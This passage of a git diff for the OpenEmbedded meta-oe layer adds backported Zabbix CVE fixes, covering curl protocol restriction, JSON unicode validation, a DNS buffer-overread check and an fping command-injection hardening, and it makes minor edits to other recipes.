7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ *error = zbx_dsprintf(*error, "Cannot set allowed protocols: %s", curl_easy_strerror(err)); ++ goto out; ++ } ++#endif ++ + if (CURLE_OK == (err = curl_easy_perform(easyhandle))) + { + if (NULL != buffer) +diff --git a/src/libs/zbxsysinfo/simple/simple.c b/src/libs/zbxsysinfo/simple/simple.c +index be1b9f9..80c5eac 100644 +--- a/src/libs/zbxsysinfo/simple/simple.c ++++ b/src/libs/zbxsysinfo/simple/simple.c +@@ -189,6 +189,17 @@ static int check_https(const char *host, unsigned short port, int timeout, int * + goto clean; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, opt = CURLOPT_PROTOCOLS, ++ CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ zabbix_log(LOG_LEVEL_DEBUG, "%s: could not set cURL option [%d]: %s", ++ __func__, (int)opt, curl_easy_strerror(err)); ++ goto clean; ++ } ++#endif ++ + if (NULL != CONFIG_SOURCE_IP) + { + if (CURLE_OK != (err = curl_easy_setopt(easyhandle, opt = CURLOPT_INTERFACE, CONFIG_SOURCE_IP))) +diff --git a/src/zabbix_server/httppoller/httptest.c b/src/zabbix_server/httppoller/httptest.c +index 0ff70ef..0201442 100644 +--- a/src/zabbix_server/httppoller/httptest.c ++++ b/src/zabbix_server/httppoller/httptest.c +@@ -696,6 +696,15 @@ static void process_httptest(DC_HOST *host, zbx_httptest_t *httptest) + goto clean; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ err_str = zbx_strdup(err_str, curl_easy_strerror(err)); ++ goto clean; ++ } ++#endif ++ + if (SUCCEED != zbx_http_prepare_ssl(easyhandle, httptest->httptest.ssl_cert_file, + httptest->httptest.ssl_key_file, httptest->httptest.ssl_key_password, + httptest->httptest.verify_peer, httptest->httptest.verify_host, &err_str)) +diff --git a/src/zabbix_server/reporter/report_writer.c b/src/zabbix_server/reporter/report_writer.c +index 87d1364..7530ed0 100644 +--- a/src/zabbix_server/reporter/report_writer.c ++++ b/src/zabbix_server/reporter/report_writer.c +@@ -162,6 +162,16 @@ static int rw_get_report(const char *url, const char *cookie, int width, int hei + goto out; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(curl, opt = CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ *error = zbx_dsprintf(*error, "Cannot set cURL option %d: %s.", (int)opt, ++ (curl_error = rw_curl_error(err))); ++ goto out; ++ } ++#endif ++ + if (NULL != CONFIG_TLS_CA_FILE && '\0' != *CONFIG_TLS_CA_FILE) + { + if (CURLE_OK != (err = curl_easy_setopt(curl, opt = CURLOPT_CAINFO, CONFIG_TLS_CA_FILE)) || +diff --git a/src/zabbix_server/vmware/vmware.c b/src/zabbix_server/vmware/vmware.c +index b02c8c7..718d519 100644 +--- a/src/zabbix_server/vmware/vmware.c ++++ b/src/zabbix_server/vmware/vmware.c +@@ -2045,6 +2045,15 @@ static int vmware_service_authenticate(zbx_vmware_service_t *service, CURL *easy + goto out; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, opt = CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ *error = zbx_dsprintf(*error, "Cannot set cURL option %d: %s.", (int)opt, curl_easy_strerror(err)); ++ goto out; ++ } ++#endif ++ + if (NULL != CONFIG_SOURCE_IP) + { + if (CURLE_OK != (err = curl_easy_setopt(easyhandle, opt = CURLOPT_INTERFACE, CONFIG_SOURCE_IP))) +-- +2.35.5 diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29451.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29451.patch new file mode 100644 index 0000000000..453f67a920 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29451.patch @@ -0,0 +1,116 @@ +From 90274a56b2505997cd1677f0bd6a8b89b21df163 Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Wed, 26 Apr 2023 15:00:07 +0800 +Subject: [PATCH] Fix CVE-2023-29451 + +.......PS. [DEV-2450] fixed JSON validation not detecting invalid unicode characters and out of bounds access with JSONPath on invalid unicode character + +Merge in ZBX/zabbix from feature/DEV-2450-6.0 to release/6.0 + +* commit '97efb4ed5069d4febe825671e2c3d106478d082d': + .......PS. [DEV-2450] added mock test + .......PS. [DEV-2450] fixed JSON validation not detecting invalid unicode characters and out of bounds access with JSONPath on invalid unicode character + .......PS. [DEV-2450] fixed JSON validation not detecting invalid unicode characters and out of bounds access with JSONPath on invalid unicode character + +Upstream-Status: Backport +[https://git.zabbix.com/projects/ZBX/repos/zabbix/commits/3b6a8c84612a67daaf89879226349420104bff24] +CVE: CVE-2023-29451 + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + src/libs/zbxdiag/diag.c | 3 ++- + src/libs/zbxjson/json.c | 2 +- + src/libs/zbxjson/json.h | 1 + + src/libs/zbxjson/json_parser.c | 15 +++++---------- + src/zabbix_server/reporter/report_protocol.c | 3 ++- + 5 files changed, 11 insertions(+), 13 deletions(-) + +diff --git a/src/libs/zbxdiag/diag.c b/src/libs/zbxdiag/diag.c +index 6fc5509..dc47407 100644 +--- a/src/libs/zbxdiag/diag.c ++++ b/src/libs/zbxdiag/diag.c +@@ -673,7 +673,8 @@ static void diag_get_simple_values(const struct zbx_json_parse *jp, char **msg) + { + if (FAIL == zbx_json_brackets_open(pnext, &jp_value)) + { +- zbx_json_decodevalue_dyn(pnext, &value, &value_alloc, &type); ++ if (NULL == zbx_json_decodevalue_dyn(pnext, &value, &value_alloc, &type)) ++ type = ZBX_JSON_TYPE_NULL; + + if (0 != msg_offset) + zbx_chrcpy_alloc(msg, &msg_alloc, &msg_offset, ' '); +diff --git a/src/libs/zbxjson/json.c b/src/libs/zbxjson/json.c +index 4161ef0..c043d7e 100644 +--- a/src/libs/zbxjson/json.c ++++ b/src/libs/zbxjson/json.c +@@ -764,7 +764,7 @@ static unsigned int zbx_hex2num(char c) + * 0 on error (invalid escape sequence) * + * * + ******************************************************************************/ +-static unsigned int zbx_json_decode_character(const char **p, unsigned char *bytes) ++unsigned int zbx_json_decode_character(const char **p, unsigned char *bytes) + { + bytes[0] = '\0'; + +diff --git a/src/libs/zbxjson/json.h b/src/libs/zbxjson/json.h +index c59646a..4008411 100644 +--- a/src/libs/zbxjson/json.h ++++ b/src/libs/zbxjson/json.h +@@ -29,5 +29,6 @@ + SKIP_WHITESPACE(src) + + void zbx_set_json_strerror(const char *fmt, ...) __zbx_attr_format_printf(1, 2); ++unsigned int zbx_json_decode_character(const char **p, unsigned char *bytes); + + #endif +diff --git a/src/libs/zbxjson/json_parser.c b/src/libs/zbxjson/json_parser.c +index c8dcee4..64d24cf 100644 +--- a/src/libs/zbxjson/json_parser.c ++++ b/src/libs/zbxjson/json_parser.c +@@ -88,7 +88,7 @@ static zbx_int64_t json_parse_string(const char *start, char **error) + if ('\\' == *ptr) + { + const char *escape_start = ptr; +- int i; ++ unsigned char uc[4]; /* decoded Unicode character takes 1-4 bytes in UTF-8 */ + + /* unexpected end of string data, failing */ + if ('\0' == *(++ptr)) +@@ -107,16 +107,11 @@ static zbx_int64_t json_parse_string(const char *start, char **error) + break; + case 'u': + /* check if the \u is followed with 4 hex digits */ +- for (i = 0; i < 4; i++) +- { +- if (0 == isxdigit((unsigned char)*(++ptr))) +- { +- return json_error("invalid escape sequence in string", +- escape_start, error); +- } ++ if (0 == zbx_json_decode_character(&ptr, uc)) { ++ return json_error("invalid escape sequence in string", ++ escape_start, error); + } +- +- break; ++ continue; + default: + return json_error("invalid escape sequence in string data", + escape_start, error); +diff --git a/src/zabbix_server/reporter/report_protocol.c b/src/zabbix_server/reporter/report_protocol.c +index 5f55f51..ee0e02e 100644 +--- a/src/zabbix_server/reporter/report_protocol.c ++++ b/src/zabbix_server/reporter/report_protocol.c +@@ -421,7 +421,8 @@ void zbx_report_test(const struct zbx_json_parse *jp, zbx_uint64_t userid, struc + size_t value_alloc = 0; + zbx_ptr_pair_t pair; + +- zbx_json_decodevalue_dyn(pnext, &value, &value_alloc, NULL); ++ if (NULL == zbx_json_decodevalue_dyn(pnext, &value, &value_alloc, NULL)) ++ continue; + pair.first = zbx_strdup(NULL, key); + pair.second = value; + zbx_vector_ptr_pair_append(¶ms, pair); +-- +2.25.1 + diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32726.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32726.patch new file mode 100644 index 0000000000..b9c37bc045 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32726.patch @@ -0,0 +1,160 @@ +From 53ef2b7119f57f4140e6bd9c5cd2d3c6af228179 Mon Sep 17 00:00:00 2001 +From: Armands Arseniuss Skolmeisters <armands.skolmeisters@zabbix.com> +Date: Thu, 11 Jan 2024 12:00:24 +0000 +Subject: [PATCH] ...G...... [DEV-2702] fixed buffer overread in DNS response + +* commit '893902999ab7f0b15cce91e8555cb251b32b6df4': + ...G...... [DEV-2702] fixed DNS record data length check + ...G...... [DEV-2702] improved DNS error messages + ...G...... [DEV-2702] fixed DNS error messages + ...G...... [DEV-2702] improved DNS error messages + ...G...... [DEV-2702] fixed buffer overread in DNS response + +CVE: CVE-2023-32726 +Upstream-Status: Backport [https://github.com/zabbix/zabbix/commit/53ef2b7119f57f4140e6bd9c5cd2d3c6af228179] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/libs/zbxsysinfo/common/dns.c | 65 +++++++++++++++++++++++++++----- + 1 file changed, 56 insertions(+), 9 deletions(-) + +diff --git a/src/libs/zbxsysinfo/common/dns.c b/src/libs/zbxsysinfo/common/dns.c +index e8938d8..bf456f2 100644 +--- a/src/libs/zbxsysinfo/common/dns.c ++++ b/src/libs/zbxsysinfo/common/dns.c +@@ -638,7 +638,8 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + { + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, ++ "Cannot decode DNS response: cannot expand domain name.")); + ret = SYSINFO_RET_FAIL; + goto clean; + } +@@ -651,6 +652,13 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + GETSHORT(q_len, msg_ptr); + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %-8s", decode_type(q_type)); + ++ if (msg_ptr + q_len > msg_end) ++ { ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response: record overflow.")); ++ ret = SYSINFO_RET_FAIL; ++ goto clean; ++ } ++ + switch (q_type) + { + case T_A: +@@ -695,8 +703,40 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + case T_PTR: + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++#define ERR_MSG_PREFIX "Cannot decode DNS response: cannot expand " ++ const char *err_msg = NULL; ++ ++ switch (q_type) ++ { ++ case T_NS: ++ err_msg = ERR_MSG_PREFIX "name server name."; ++ break; ++ case T_CNAME: ++ err_msg = ERR_MSG_PREFIX "canonical name."; ++ break; ++ case T_MB: ++ err_msg = ERR_MSG_PREFIX "mailbox name."; ++ break; ++ case T_MD: ++ err_msg = ERR_MSG_PREFIX "mail destination name."; ++ break; ++ case T_MF: ++ err_msg = ERR_MSG_PREFIX "mail forwarder name."; ++ break; ++ case T_MG: ++ err_msg = ERR_MSG_PREFIX "mail group name."; ++ break; ++ case T_MR: ++ err_msg = ERR_MSG_PREFIX "renamed mailbox name."; ++ break; ++ case T_PTR: ++ err_msg = ERR_MSG_PREFIX "PTR name."; ++ break; ++ } ++ ++ SET_MSG_RESULT(result, zbx_strdup(NULL, err_msg)); + return SYSINFO_RET_FAIL; ++#undef ERR_MSG_PREFIX + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); + break; +@@ -706,7 +746,8 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* exchange */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " cannot expand mail exchange name.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); +@@ -715,14 +756,16 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + case T_SOA: + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* source host */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " cannot expand source nameserver name.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); + + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* administrator */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " cannot expand administrator mailbox name.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); +@@ -750,7 +793,8 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + case T_WKS: + if (INT32SZ + 1 > q_len) + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " malformed WKS resource record.")); + return SYSINFO_RET_FAIL; + } + +@@ -816,14 +860,16 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + case T_MINFO: + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* mailbox responsible for mailing lists */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " cannot expand mailbox responsible for mailing lists.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); + + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* mailbox for error messages */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " cannot expand mailbox for error messages.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); +@@ -854,7 +900,8 @@ static int dns_query(AGENT_REQUEST *request, AGENT_RESULT *result, int short_ans + + if (NULL == (name = get_name(answer.buffer, msg_end, &msg_ptr))) /* target */ + { +- SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response.")); ++ SET_MSG_RESULT(result, zbx_strdup(NULL, "Cannot decode DNS response:" ++ " cannot expand service target hostname.")); + return SYSINFO_RET_FAIL; + } + offset += zbx_snprintf(buffer + offset, sizeof(buffer) - offset, " %s", name); +-- +2.40.0 diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0001.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0001.patch new file mode 100644 index 0000000000..5c1e0c5af6 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0001.patch @@ -0,0 +1,193 @@ +From 93e090592fc6de7ec5d3d42c1bb9074ad1f3ba34 Mon Sep 17 00:00:00 2001 +From: Andris Zeila <andris.zeila@zabbix.com> +Date: Fri, 12 Jan 2024 05:48:31 +0000 +Subject: [PATCH] .......PS. [DEV-2695] changed fping tests to read address + from file + +Merge in ZBX/zabbix from feature/DEV-2695-6.0 to release/6.0 + +* commit '6603893ff94620e28fc543d5d0d4c86b9be3342e': + .......PS. [DEV-2695] fixed signal blocking + .......PS. [DEV-2695] added target hostname/ip validation in fping feature tests + .......PS. [DEV-2695] added error messages when failed to prepare temporary file for fping tests + .......PS. [DEV-2695] changed fping tests to read address from file + +CVE: CVE-2023-32727 +Upstream-Status: BAckport [https://github.com/zabbix/zabbix/commit/93e090592fc6de7ec5d3d42c1bb9074ad1f3ba34] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/libs/zbxicmpping/icmpping.c | 125 ++++++++++++++++++++++++++++---- + 1 file changed, 112 insertions(+), 13 deletions(-) + +diff --git a/src/libs/zbxicmpping/icmpping.c b/src/libs/zbxicmpping/icmpping.c +index 72f7e86..9a751b7 100644 +--- a/src/libs/zbxicmpping/icmpping.c ++++ b/src/libs/zbxicmpping/icmpping.c +@@ -59,6 +59,8 @@ static void get_source_ip_option(const char *fping, const char **option, unsigne + + zbx_snprintf(tmp, sizeof(tmp), "%s -h 2>&1", fping); + ++ zabbix_log(LOG_LEVEL_DEBUG, "executing %s", tmp); ++ + if (NULL == (f = popen(tmp, "r"))) + return; + +@@ -85,6 +87,110 @@ static void get_source_ip_option(const char *fping, const char **option, unsigne + *checked = 1; + } + ++/****************************************************************************** ++ * * ++ * Purpose: execute external program and return stdout and stderr values * ++ * * ++ * Parameters: fping - [IN] location of fping program * ++ * out - [OUT] stdout and stderr values * ++ * error - [OUT] error string if function fails * ++ * max_error_len - [IN] length of error buffer * ++ * * ++ * Return value: SUCCEED if processed successfully or FAIL otherwise * ++ * * ++ ******************************************************************************/ ++static int get_fping_out(const char *fping, const char *address, char **out, char *error, size_t max_error_len) ++{ ++ FILE *f; ++ size_t buf_size = 0, offset = 0, len; ++ ssize_t n; ++ char tmp[MAX_STRING_LEN], *buffer = NULL; ++ int ret = FAIL, fd; ++ sigset_t mask, orig_mask; ++ char filename[MAX_STRING_LEN]; ++ ++ if (FAIL == zbx_validate_hostname(address) && FAIL == is_supported_ip(address)) ++ { ++ zbx_strlcpy(error, "Invalid host name or IP address", max_error_len); ++ return FAIL; ++ } ++ ++ zbx_snprintf(filename, sizeof(filename), "%s/%s_XXXXXX", CONFIG_TMPDIR, progname); ++ if (-1 == (fd = mkstemp(filename))) ++ { ++ zbx_snprintf(error, max_error_len, "Cannot create temporary file \"%s\": %s", filename, ++ zbx_strerror(errno)); ++ ++ return FAIL; ++ } ++ ++ sigemptyset(&mask); ++ sigaddset(&mask, SIGINT); ++ sigaddset(&mask, SIGQUIT); ++ ++ len = strlen(address); ++ if (-1 == (n = write(fd, address, len))) ++ { ++ zbx_snprintf(error, max_error_len, "Cannot write address into temporary file: %s", zbx_strerror(errno)); ++ (void)close(fd); ++ goto out; ++ } ++ ++ if (n != (ssize_t)len) ++ { ++ zbx_strlcpy(error, "Cannot write full address into temporary file", max_error_len); ++ (void)close(fd); ++ goto out; ++ } ++ ++ if (-1 == close(fd)) ++ { ++ zbx_snprintf(error, max_error_len, "Cannot close temporary file: %s", zbx_strerror(errno)); ++ goto out; ++ } ++ ++ zbx_snprintf(tmp, sizeof(tmp), "%s 2>&1 < %s", fping, filename); ++ ++ if (0 > sigprocmask(SIG_BLOCK, &mask, &orig_mask)) ++ zbx_error("cannot set sigprocmask to block the user signal"); ++ ++ zabbix_log(LOG_LEVEL_DEBUG, "executing %s", tmp); ++ ++ if (NULL == (f = popen(tmp, "r"))) ++ { ++ zbx_strlcpy(error, zbx_strerror(errno), max_error_len); ++ goto out; ++ } ++ ++ while (NULL != zbx_fgets(tmp, sizeof(tmp), f)) ++ { ++ len = strlen(tmp); ++ ++ if (MAX_EXECUTE_OUTPUT_LEN < offset + len) ++ break; ++ ++ zbx_strncpy_alloc(&buffer, &buf_size, &offset, tmp, len); ++ } ++ ++ pclose(f); ++ ++ if (NULL == buffer) ++ { ++ zbx_strlcpy(error, "Cannot obtain the program output", max_error_len); ++ goto out; ++ } ++ ++ *out = buffer; ++ ret = SUCCEED; ++out: ++ unlink(filename); ++ ++ if (0 > sigprocmask(SIG_SETMASK, &orig_mask, NULL)) ++ zbx_error("cannot restore sigprocmask"); ++ ++ return ret; ++} ++ + /****************************************************************************** + * * + * Function: get_interval_option * +@@ -137,19 +243,12 @@ static int get_interval_option(const char *fping, ZBX_FPING_HOST *hosts, int hos + + zabbix_log(LOG_LEVEL_DEBUG, "testing fping interval %u ms", intervals[j]); + +- zbx_snprintf(tmp, sizeof(tmp), "%s -c1 -t50 -i%u %s", fping, intervals[j], dst); ++ zbx_snprintf(tmp, sizeof(tmp), "%s -c1 -t50 -i%u", fping, intervals[j]); + + zbx_free(out); + + /* call fping, ignore its exit code but mind execution failures */ +- if (TIMEOUT_ERROR == (ret_exec = zbx_execute(tmp, &out, err, sizeof(err), 1, +- ZBX_EXIT_CODE_CHECKS_DISABLED, NULL))) +- { +- zbx_snprintf(error, max_error_len, "Timeout while executing \"%s\"", tmp); +- goto out; +- } +- +- if (FAIL == ret_exec) ++ if (SUCCEED != (ret_exec = get_fping_out(tmp, dst, &out, err, sizeof(err)))) + { + zbx_snprintf(error, max_error_len, "Cannot execute \"%s\": %s", tmp, err); + goto out; +@@ -251,10 +350,10 @@ static int get_ipv6_support(const char * fping, const char *dst) + int ret; + char tmp[MAX_STRING_LEN], error[255], *out = NULL; + +- zbx_snprintf(tmp, sizeof(tmp), "%s -6 -c1 -t50 %s", fping, dst); ++ zbx_snprintf(tmp, sizeof(tmp), "%s -6 -c1 -t50", fping); + +- if ((SUCCEED == (ret = zbx_execute(tmp, &out, error, sizeof(error), 1, ZBX_EXIT_CODE_CHECKS_DISABLED, NULL)) && +- ZBX_KIBIBYTE > strlen(out) && NULL != strstr(out, dst)) || TIMEOUT_ERROR == ret) ++ if (SUCCEED == (ret = get_fping_out(tmp, dst, &out, error, sizeof(error)) && ++ ZBX_KIBIBYTE > strlen(out) && NULL != strstr(out, dst))) + { + ret = SUCCEED; + } +@@ -538,7 +637,7 @@ static int process_ping(ZBX_FPING_HOST *hosts, int hosts_count, int count, int i + + fclose(f); + +- zabbix_log(LOG_LEVEL_DEBUG, "%s", tmp); ++ zabbix_log(LOG_LEVEL_DEBUG, "executing %s", tmp); + + sigemptyset(&mask); + sigaddset(&mask, SIGINT); +-- +2.40.0 diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0002.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0002.patch new file mode 100644 index 0000000000..aabc675b6a --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32727_0002.patch @@ -0,0 +1,49 @@ +From 610f9fdbb86667f4094972547deb936c6cdfc6d5 Mon Sep 17 00:00:00 2001 +From: Andris Zeila <andris.zeila@zabbix.com> +Date: Fri, 12 Jan 2024 06:06:02 +0000 +Subject: [PATCH] .......PS. [DEV-2695] removed group/all access flags for + fping temporary files + +Merge in ZBX/zabbix from feature/DEV-2695-6.5 to master + +* commit 'cf07db1d5c2b8fe4a9de85fed22cf05035e08914': + .......PS. [DEV-2695] remove group/all access flags when creating fping input file for testing fping features + +(cherry picked from commit cd12f0a2d89c3ef05f0e9f50dcb73fdaf3a7e8a9) + +CVE: CVE-2023-32727 +Upstream_Status: Backport [https://github.com/zabbix/zabbix/commit/610f9fdbb86667f4094972547deb936c6cdfc6d5] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/libs/zbxicmpping/icmpping.c | 8 +++++++- + 1 file changed, 7 insertions(+), 1 deletion(-) + +diff --git a/src/libs/zbxicmpping/icmpping.c b/src/libs/zbxicmpping/icmpping.c +index 9a751b7..bab3d09 100644 +--- a/src/libs/zbxicmpping/icmpping.c ++++ b/src/libs/zbxicmpping/icmpping.c +@@ -108,6 +108,7 @@ static int get_fping_out(const char *fping, const char *address, char **out, cha + int ret = FAIL, fd; + sigset_t mask, orig_mask; + char filename[MAX_STRING_LEN]; ++ mode_t mode; + + if (FAIL == zbx_validate_hostname(address) && FAIL == is_supported_ip(address)) + { +@@ -116,7 +117,12 @@ static int get_fping_out(const char *fping, const char *address, char **out, cha + } + + zbx_snprintf(filename, sizeof(filename), "%s/%s_XXXXXX", CONFIG_TMPDIR, progname); +- if (-1 == (fd = mkstemp(filename))) ++ ++ mode = umask(077); ++ fd = mkstemp(filename); ++ umask(mode); ++ ++ if (-1 == fd) + { + zbx_snprintf(error, max_error_len, "Cannot create temporary file \"%s\": %s", filename, + zbx_strerror(errno)); +-- +2.40.0 diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix_5.4.12.bb b/meta-oe/recipes-connectivity/zabbix/zabbix_5.4.12.bb index f5d89d6c3d..2793f0ca5f 100644 --- a/meta-oe/recipes-connectivity/zabbix/zabbix_5.4.12.bb +++ b/meta-oe/recipes-connectivity/zabbix/zabbix_5.4.12.bb @@ -26,6 +26,14 @@ PACKAGE_ARCH = "${MACHINE_ARCH}" SRC_URI = "https://cdn.zabbix.com/zabbix/sources/stable/5.4/${BPN}-${PV}.tar.gz \ file://0001-Fix-configure.ac.patch \ file://zabbix-agent.service \ + file://CVE-2022-43515.patch \ + file://CVE-2022-46768.patch \ + file://CVE-2023-29451.patch \ + file://CVE-2023-29449.patch \ + file://CVE-2023-29450.patch \ + file://CVE-2023-32726.patch \ + file://CVE-2023-32727_0001.patch \ + file://CVE-2023-32727_0002.patch \ " SRC_URI[md5sum] = "f295fd2df86143d72f6ff26e47d9e39e" diff --git a/meta-oe/recipes-connectivity/zeromq/czmq_4.2.1.bb b/meta-oe/recipes-connectivity/zeromq/czmq_4.2.1.bb index 86fde7ccfb..ce9d758d9f 100644 --- a/meta-oe/recipes-connectivity/zeromq/czmq_4.2.1.bb +++ b/meta-oe/recipes-connectivity/zeromq/czmq_4.2.1.bb @@ -30,8 +30,6 @@ PACKAGECONFIG[nss] = "-DCZMQ_WITH_NSS=ON,-DCZMQ_WITH_NSS=OFF,nss" PACKAGECONFIG[systemd] = "-DCZMQ_WITH_SYSTEMD=ON,-DCZMQ_WITH_SYSTEMD=OFF,systemd" PACKAGECONFIG[uuid] = "-DCZMQ_WITH_UUID=ON,-DCZMQ_WITH_UUID=OFF,util-linux" -BBCLASSEXTEND = "nativesdk" - do_install:append() { mkdir -p ${D}/${includedir}/${BPN} mv ${D}/${includedir}/sha1.h ${D}/${includedir}/${BPN}/. diff --git a/meta-oe/recipes-core/dbus-cxx/dbus-cxx_2.1.0.bb b/meta-oe/recipes-core/dbus-cxx/dbus-cxx_2.1.0.bb index c8dabc5ead..44804545de 100644 --- a/meta-oe/recipes-core/dbus-cxx/dbus-cxx_2.1.0.bb +++ b/meta-oe/recipes-core/dbus-cxx/dbus-cxx_2.1.0.bb @@ -9,7 +9,7 @@ SRC_URI = "git://github.com/dbus-cxx/dbus-cxx.git;branch=master;protocol=https \ file://0001-Include-typeinfo-for-typeid.patch \ file://0001-include-utility-header.patch \ " -SRC_URI:append:libc-musl = "file://fix_build_musl.patch" +SRC_URI:append:libc-musl = " file://fix_build_musl.patch" SRCREV = "73532d6a5faae9c721c2cc9535b8ef32d4d18264" DEPENDS = "\ diff --git a/meta-oe/recipes-core/emlog/emlog.inc b/meta-oe/recipes-core/emlog/emlog.inc index 824787083a..9d48e9cba3 100644 --- a/meta-oe/recipes-core/emlog/emlog.inc +++ b/meta-oe/recipes-core/emlog/emlog.inc @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" SRC_URI = "git://github.com/nicupavel/emlog.git;protocol=http;branch=master;protocol=https" SRCREV = "aee53e8dee862f35291242ba41b0ca88010f6c71" - +PV = "0.70+git${SRCPV}" S = "${WORKDIR}/git" EXTRA_OEMAKE += " \ diff --git a/meta-oe/recipes-core/emlog/emlog_git.bb b/meta-oe/recipes-core/emlog/emlog_git.bb index 05fa0c334c..2ded3e204f 100644 --- a/meta-oe/recipes-core/emlog/emlog_git.bb +++ b/meta-oe/recipes-core/emlog/emlog_git.bb @@ -34,4 +34,6 @@ CVE_CHECK_IGNORE += "\ CVE-2019-17073 \ CVE-2021-44584 \ CVE-2022-1526 \ + CVE-2022-3968 \ + CVE-2023-43291 \ " diff --git a/meta-oe/recipes-core/sdbus-c++/sdbus-c++_1.0.0.bb b/meta-oe/recipes-core/sdbus-c++/sdbus-c++_1.0.0.bb index 76fd6b65b1..6fd826cbbd 100644 --- a/meta-oe/recipes-core/sdbus-c++/sdbus-c++_1.0.0.bb +++ b/meta-oe/recipes-core/sdbus-c++/sdbus-c++_1.0.0.bb @@ -39,6 +39,11 @@ do_install:append() { fi } 